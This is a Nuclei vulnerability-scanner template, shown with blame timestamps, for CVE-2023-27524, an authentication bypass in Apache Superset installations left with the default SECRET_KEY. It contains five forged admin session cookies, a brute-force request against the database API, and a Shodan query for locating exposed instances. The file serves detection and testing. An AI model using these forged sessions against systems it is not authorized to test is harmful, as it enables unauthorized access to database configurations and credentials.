nuclei-templates/http/cves/2023/CVE-2023-27524.yaml

63 lines
2.0 KiB
YAML
Raw Normal View History

2023-04-25 13:32:59 +00:00
id: CVE-2023-27524
info:
2023-04-26 02:45:47 +00:00
name: Apache Superset - Authentication Bypass
2023-04-26 09:03:59 +00:00
author: DhiyaneshDK,_0xf4n9x_
2023-04-25 13:32:59 +00:00
severity: high
description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
reference:
- https://github.com/horizon3ai/CVE-2023-27524
2023-04-26 09:03:59 +00:00
- https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
2023-04-25 13:32:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-27524
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
cvss-score: 8.9
cve-id: CVE-2023-27524
cwe-id: CWE-1188
metadata:
max-request: 45
2023-06-04 08:13:42 +00:00
verified: true
2023-04-25 13:32:59 +00:00
shodan-query: html:"Apache Superset"
tags: cve,cve2023,apache,superset,auth-bypass
http:
2023-04-25 13:32:59 +00:00
- raw:
- |
2023-04-26 09:03:59 +00:00
GET /api/v1/database/{{path}} HTTP/1.1
2023-04-25 13:32:59 +00:00
Host: {{Hostname}}
2023-04-26 09:03:59 +00:00
Cookie: session={{session}}
2023-04-25 13:32:59 +00:00
2023-04-26 09:03:59 +00:00
payloads:
2023-04-26 11:57:03 +00:00
path:
2023-04-26 09:03:59 +00:00
- '1'
- '2'
- '3'
- '4'
- '5'
- '6'
- '7'
- '9'
- '10'
2023-04-26 11:57:03 +00:00
session:
2023-07-10 15:21:35 +00:00
- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk'
- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0'
- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM'
- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY'
- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U'
2023-04-26 09:03:59 +00:00
attack: clusterbomb
2023-04-25 13:32:59 +00:00
2023-04-26 09:03:59 +00:00
stop-at-first-match: true
2023-04-25 13:32:59 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"database_name":'
2023-04-26 02:45:47 +00:00
- '"configuration_method":'
condition: and
2023-04-25 13:32:59 +00:00
- type: status
status:
- 200